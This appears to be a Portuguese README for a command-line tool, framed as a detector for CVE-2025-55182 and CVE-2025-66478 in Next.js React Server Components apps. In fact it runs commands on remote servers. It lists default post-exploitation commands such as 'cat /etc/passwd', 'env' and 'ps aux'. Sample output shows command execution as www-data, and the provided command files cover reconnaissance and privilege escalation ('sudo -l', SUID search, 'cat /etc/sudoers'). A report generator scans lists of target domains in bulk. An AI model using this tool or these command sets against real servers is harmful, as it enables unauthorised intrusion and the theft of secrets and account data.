
Uma ferramenta de linha de comando para detectar CVE-2025-55182 e CVE-2025-66478 em aplicações Next.js usando React Server Components.
Uma ferramenta de linha de comando para detectar CVE-2025-55182 e CVE-2025-66478 em aplicações Next.js que usam React Server Components.
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
CVE-2025-55182 -d https://example.com
Nota: Se nenhuma opção de comando for fornecida, os comandos padrão são executados.
A ferramenta executa estes comandos por padrão:
cat /etc/os-release - Informações do SOwhoami - Usuário atualpwd - Diretório de trabalho atualid - ID do usuário e gruposuname -a - Informações do sistemahostname -I - Interfaces de redels -la - Listagem de diretóriocat /etc/passwd - Contas de usuárioenv - Variáveis de ambienteps aux - Processos em execuçãoA ferramenta reportgenerator gera automaticamente relatórios profissionais de divulgação de vulnerabilidades a partir dos resultados da varredura.
# Create a file with target domains
echo -e "https://target1.com\nhttps://target2.com" > subs.txt
# Run report generator
reportgenerator
| Flag | Descrição | Padrão |
|---|---|---|
--file | Arquivo de entrada contendo domínios alvo | subs.txt |
--user | Nome do pesquisador para a seção de divulgação | Bhagirath Saxena |
# Use default settings (subs.txt, Bhagirath Saxena)
reportgenerator
# Use custom target file
reportgenerator --file targets.txt
# Use custom researcher name
reportgenerator --user "John Doe"
# Use both custom options
reportgenerator --file my-targets.txt --user "Jane Smith"
Os relatórios são gerados em dois diretórios:
textfile/ - Saída bruta da varredura (numerada: 1.txt, 2.txt, etc.)mdfile/ - Relatórios profissionais em markdown (numerados: 1.md, 2.md, etc.)Nota: O recurso de numeração automática garante que relatórios existentes nunca sejam sobrescritos. Novas varreduras continuam a partir do número existente mais alto.
Cada relatório gerado inclui:
▼ 🎯 ALVO: https://vulnerable-app.com
▼ 📋 COMANDOS A EXECUTAR: 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] Executando: cat /etc/os-release
▼ 💻 INFORMAÇÕES DO SO
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] Executando: whoami
▼ 👤 USUÁRIO ATUAL
║ www-data
...
[3/10] Executando: pwd
▼ 📂 DIRETÓRIO ATUAL
║ /var/www/html
...
[6/10] Executando: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Comando falhou: hostname -I
║ Este comando pode não estar disponível ou o servidor o rejeitou
╚════════════════════════════════════════════════════════════╝
[!] Tentando comando de rede alternativo...
▼ 🌐 INTERFACES DE REDE (alternativo)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
commands/:Crie arquivos de comando de exemplo para diferentes cenários:
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
| Opção | Descrição | Padrão |
|---|
-d, --domain | URL alvo (adiciona https:// automaticamente se não houver protocolo) | http://localhost:3000 |
-c, --command | Comando único a executar | - |
-m, --multiple | Múltiplos comandos separados por ponto e vírgula | - |
-f, --file | Arquivo contendo comandos (um por linha) | - |
-h, --help | Mostrar mensagem de ajuda | - |